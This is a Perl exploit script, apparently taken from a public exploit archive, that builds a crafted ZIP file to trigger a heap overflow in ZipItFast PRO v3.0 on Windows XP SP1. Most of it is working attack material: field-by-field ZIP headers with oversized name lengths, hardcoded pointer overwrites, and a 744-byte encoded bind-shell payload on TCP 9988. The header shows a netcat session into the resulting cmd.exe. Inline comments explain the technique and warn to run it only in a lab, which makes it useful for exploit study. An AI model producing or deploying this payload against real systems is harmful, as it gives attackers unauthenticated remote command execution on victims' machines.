
# Title : ZipItFast PRO v3.0 Heap Overflow Exploit
# Published : 2012-07-12
# Author :


#!/usr/bin/perl

#---------------------------------------------------------------------------#
# Exploit: ZipItFast PRO v3.0 Heap-Overflow                                 #
# Author: b33f - http://www.fuzzysecurity.com/                              #
# OS: Windows XP SP1                                                        #
# DOS POC: C4SS!0 G0M3S => http://www.exploit-db.com/exploits/17512/        #
# Software: http://www.exploit-db.com/wp-content/themes/exploit/            #
#           applications/decbc54ffcf644e780a3ef4fcdd27093-zipitfastnow.exe  #
#---------------------------------------------------------------------------#
# Sorry for reinventing the wheel but learning about heap-overflows         #
# requires you to take a step back and roll with the punches not unlike     #
# watching a David Lynch production ;))...                                  #
#                                                                           #
# - "Who is that lady with the log?"                                        #
# + "We call her the log-lady.."                                            #
#---------------------------------------------------------------------------#
# root@bt:~# nc -nv 192.168.111.131 9988                                    #
# (UNKNOWN) [192.168.111.131] 9988 (?) open                                 #
# Microsoft Windows XP [Version 5.1.2600]                                   #
# (C) Copyright 1985-2001 Microsoft Corp.                                   #
#                                                                           #
# C:\Documents and Settings\Owner\Desktop>                                  #
#---------------------------------------------------------------------------#

use strict;
use warnings;
 
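my $filename = "Exploit.zip";

# The archive is assembled by hand from three ZIP records: a local file header,
# one central-directory entry and the end-of-central-directory record.  The two
# file-name fields are the overflow vehicle: both headers declare a 0x0FE4
# (4068-byte) name, and $buf1 / $buf2 below supply names of that size.
#
# Every byte string here was published without the backslash of its "\x"
# escapes (extraction damage); they are restored so the script emits the bytes
# the author intended instead of the literal text "x50x4B...".

# Local file header (30 bytes), kept byte-for-byte as published (it comes from
# the DoS PoC credited in the file header).  NOTE(review): counting the bytes,
# the 0xE4 0x0F pair lands at offsets 25-26, one byte before the standard
# name-length field at 26-27 -- the central-directory entry below IS aligned.
# Left untouched because the PoC is tuned to this exact layout; re-check
# against the PKWARE APPNOTE before reusing it as a generic template.
my $head =
    "\x50\x4B\x03\x04\x14\x00\x00" .               # "PK\3\4", version needed 2.0, flags
    "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .   # method (stored), mod time/date, start of CRC
    "\x00\x00\x00\x00\x00\x00\x00\x00" .           # CRC / sizes, all zero (nothing is actually stored)
    "\xe4\x0f" .                                   # 0x0FE4 = 4068, intended as the name length
    "\x00\x00\x00";                                # extra-field length / trailing padding

# Central-directory file header (46 bytes), grouped by field.
my $head2 =
    "\x50\x4B\x01\x02" .        # signature "PK\1\2"
    "\x14\x00" .                # version made by
    "\x14\x00" .                # version needed to extract
    "\x00\x00" .                # general-purpose flags
    "\x00\x00" .                # compression method: stored
    "\xB7\xAC" .                # last-mod time
    "\xCE\x34" .                # last-mod date
    "\x00\x00\x00\x00" .        # CRC-32 (zero; parsers rarely verify before reading the name)
    "\x00\x00\x00\x00" .        # compressed size
    "\x00\x00\x00\x00" .        # uncompressed size
    "\xe4\x0f" .                # file-name length = 0x0FE4 = 4068 -> matches length($buf2) order
    "\x00\x00" .                # extra-field length
    "\x00\x00" .                # file-comment length
    "\x00\x00" .                # disk number start
    "\x01\x00" .                # internal attributes
    "\x24\x00\x00\x00" .        # external attributes
    "\x00\x00\x00\x00";         # relative offset of the local header (it is first in the file)

# End-of-central-directory record (22 bytes).  The size/offset fields are
# consistent with one 4068-byte name: 0x1012 = 46 + 4068, 0x1002 = 30 + 4068.
my $head3 =
    "\x50\x4B\x05\x06" .        # signature "PK\5\6"
    "\x00\x00" .                # this disk
    "\x00\x00" .                # disk holding the central directory
    "\x01\x00" .                # entries on this disk
    "\x01\x00" .                # total entries
    "\x12\x10\x00\x00" .        # size of central directory = 4114
    "\x02\x10\x00\x00" .        # offset of central directory = 4098
    "\x00\x00";                 # comment length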

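# Shellcode: windows/shell_bind_tcp, LPORT=9988, run through x86/alpha_mixed,
# 744 bytes.  Generated with (as published; the -t output-format argument is
# truncated in the original listing):
#   msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t
#   [*] x86/alpha_mixed succeeded with size 744 (iteration=1)
# The first seven bytes are the encoder's GetPC stub; everything after it is
# alphanumeric, presumably so the payload survives inside a file-name field.
#
# WARNING: this is an UNAUTHENTICATED bind shell on TCP/9988 -- anyone who can
# reach the target gets a cmd.exe in the context of the user running ZipItFast
# (the file header shows the author connecting with plain nc).  Detonate only
# on an isolated lab host.
#
# The "\x" escapes lost their backslashes in the published listing; restored here.
my $ph33r =
"\x89\xe2\xda\xd5\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x39\x6c\x39\x78\x4c\x49\x55\x50\x47\x70" .
"\x55\x50\x35\x30\x6f\x79\x59\x75\x54\x71\x78\x52\x52\x44" .
"\x6e\x6b\x42\x72\x44\x70\x6e\x6b\x30\x52\x56\x6c\x4e\x6b" .
"\x30\x52\x35\x44\x4e\x6b\x52\x52\x77\x58\x56\x6f\x68\x37" .
"\x61\x5a\x46\x46\x64\x71\x79\x6f\x74\x71\x6f\x30\x6c\x6c" .
"\x75\x6c\x65\x31\x33\x4c\x56\x62\x34\x6c\x31\x30\x6f\x31" .
"\x4a\x6f\x64\x4d\x73\x31\x6a\x67\x6d\x32\x4c\x30\x70\x52" .
"\x56\x37\x4e\x6b\x50\x52\x76\x70\x6c\x4b\x61\x52\x77\x4c" .
"\x73\x31\x6a\x70\x4c\x4b\x37\x30\x52\x58\x6f\x75\x79\x50" .
"\x72\x54\x73\x7a\x45\x51\x4a\x70\x42\x70\x4c\x4b\x32\x68" .
"\x65\x48\x6c\x4b\x63\x68\x65\x70\x76\x61\x39\x43\x6b\x53" .
"\x65\x6c\x77\x39\x4e\x6b\x76\x54\x4c\x4b\x76\x61\x48\x56" .
"\x76\x51\x49\x6f\x55\x61\x79\x50\x6e\x4c\x6f\x31\x58\x4f" .
"\x56\x6d\x45\x51\x38\x47\x66\x58\x69\x70\x42\x55\x6a\x54" .
"\x74\x43\x53\x4d\x5a\x58\x77\x4b\x73\x4d\x64\x64\x33\x45" .
"\x48\x62\x73\x68\x6e\x6b\x61\x48\x76\x44\x76\x61\x6a\x73" .
"\x50\x66\x6e\x6b\x46\x6c\x62\x6b\x6c\x4b\x36\x38\x35\x4c" .
"\x56\x61\x4b\x63\x6c\x4b\x43\x34\x6e\x6b\x33\x31\x7a\x70" .
"\x6e\x69\x62\x64\x34\x64\x56\x44\x33\x6b\x63\x6b\x50\x61" .
"\x31\x49\x73\x6a\x72\x71\x79\x6f\x59\x70\x32\x78\x33\x6f" .
"\x32\x7a\x4e\x6b\x56\x72\x68\x6b\x6b\x36\x43\x6d\x71\x78" .
"\x47\x43\x55\x62\x47\x70\x67\x70\x71\x78\x53\x47\x42\x53" .
"\x50\x32\x31\x4f\x46\x34\x53\x58\x70\x4c\x30\x77\x76\x46" .
"\x47\x77\x6b\x4f\x38\x55\x6f\x48\x6e\x70\x37\x71\x77\x70" .
"\x77\x70\x65\x79\x6f\x34\x42\x74\x76\x30\x75\x38\x46\x49" .
"\x6b\x30\x30\x6b\x53\x30\x79\x6f\x4e\x35\x30\x50\x62\x70" .
"\x62\x70\x52\x70\x33\x70\x42\x70\x51\x50\x42\x70\x72\x48" .
"\x68\x6a\x74\x4f\x39\x4f\x79\x70\x69\x6f\x4e\x35\x6e\x69" .
"\x6f\x37\x34\x71\x4b\x6b\x76\x33\x63\x58\x66\x62\x65\x50" .
"\x35\x77\x55\x54\x6e\x69\x4a\x46\x51\x7a\x56\x70\x33\x66" .
"\x66\x37\x51\x78\x6f\x32\x39\x4b\x77\x47\x55\x37\x6b\x4f" .
"\x4b\x65\x66\x33\x31\x47\x50\x68\x4d\x67\x48\x69\x75\x68" .
"\x4b\x4f\x49\x6f\x4e\x35\x32\x73\x62\x73\x62\x77\x32\x48" .
"\x43\x44\x68\x6c\x45\x6b\x6d\x31\x6b\x4f\x4e\x35\x42\x77" .
"\x6f\x79\x78\x47\x52\x48\x62\x55\x70\x6e\x30\x4d\x75\x31" .
"\x6b\x4f\x59\x45\x53\x58\x50\x63\x62\x4d\x32\x44\x73\x30" .
"\x4f\x79\x79\x73\x63\x67\x56\x37\x73\x67\x35\x61\x39\x66" .
"\x51\x7a\x66\x72\x36\x39\x61\x46\x58\x62\x6b\x4d\x63\x56" .
"\x39\x57\x70\x44\x34\x64\x37\x4c\x53\x31\x57\x71\x4e\x6d" .
"\x70\x44\x66\x44\x74\x50\x7a\x66\x75\x50\x42\x64\x62\x74" .
"\x36\x30\x71\x46\x42\x76\x30\x56\x72\x66\x30\x56\x30\x4e" .
"\x70\x56\x76\x36\x73\x63\x53\x66\x33\x58\x72\x59\x38\x4c" .
"\x47\x4f\x4c\x46\x59\x6f\x4a\x75\x6f\x79\x59\x70\x50\x4e" .
"\x53\x66\x71\x56\x59\x6f\x56\x50\x75\x38\x34\x48\x6f\x77" .
"\x37\x6d\x63\x50\x59\x6f\x79\x45\x4f\x4b\x48\x70\x6c\x75" .
"\x4c\x62\x31\x46\x45\x38\x6f\x56\x5a\x35\x4d\x6d\x6f\x6d" .
"\x79\x6f\x5a\x75\x55\x6c\x37\x76\x53\x4c\x45\x5a\x4f\x70" .
"\x79\x6b\x4d\x30\x43\x45\x73\x35\x4d\x6b\x63\x77\x77\x63" .
"\x70\x72\x50\x6f\x70\x6a\x77\x70\x61\x43\x59\x6f\x79\x45" .
"\x41\x41";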

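# First file name: fills the local-header name slot.  4064 + ".txt" = 4068
# bytes, the 0x0FE4 length the headers declare.
my $buf1 = ("A" x 4064) . ".txt";

# Overwritten heap-chunk link pointers, from the author's notes:
#   EAX (+256 bytes) => 0x77fc3210 - 0x04 = 0x77fc320c  (_VECTORED_EXCEPTION_NODE,
#                       presumably inside ntdll on the author's box)
#   EDX (+260 bytes) => 0x0012FA28 - 0x08 = 0x0012FA20  (pointer back into the
#                       shellcode copy on the stack)
# "\xEB\x0A" is a short forward jmp that steps over the two overwritten
# Flink/Blink dwords, so execution landing at the start of $magic falls
# through into the padding and payload that follow it.
# Both addresses are taken from a Windows XP SP1 process (see the file header)
# and are environment-specific: a different service pack, ntdll build or stack
# layout will move them, and they must be re-derived in a debugger.
my $magic = "\xEB\x0A" . "\x0C\x32\xFC\x77" . "\x20\xFA\x12\x00";

# Second file name: fills the central-directory name slot and carries the
# payload -- NOP sled, the two pointers, padding, the 744-byte bind shell, and
# filler.  The author warns that the offsets do not line up exactly (the sled
# is 253 bytes against the 256/260-byte offsets noted above, and the whole
# name is 253+10+300+744+2756+4 = 4067 bytes against the declared 4068):
# buffer expansion and compression were observed depending on the buffer's
# structure, so expect to re-tune when testing.
#
# Debugging tip from the author: set your debugger's anti-debugging hiding
# flags before attaching (Immunity: !hidedebug All_Debug), which implies the
# target performs debugger checks.
my $buf2 = ("\x90" x 253) . $magic . ("A" x 300) . $ph33r . ("A" x 2756) . ".txt";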

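# Final layout: local header, first name, central-directory entry, second
# name, end-of-central-directory record.
my $zip = $head . $buf1 . $head2 . $buf2 . $head3;

# Three-argument open with a lexical handle.  The published form,
# `open(FILE, ">$filename") || die ...`, never died: `||` bound to the
# always-true mode string rather than to open()'s return value, so a failed
# open would silently print to a closed handle.
open(my $fh, '>', $filename) or die "[-]Error:\n$!\n";
# Raw bytes: on Windows the default text layer would rewrite 0x0A in the
# shellcode/headers as CR LF and corrupt the archive.
binmode($fh);
print {$fh} $zip;
# Buffered write errors only surface at close.
close($fh) or die "[-]Error:\n$!\n";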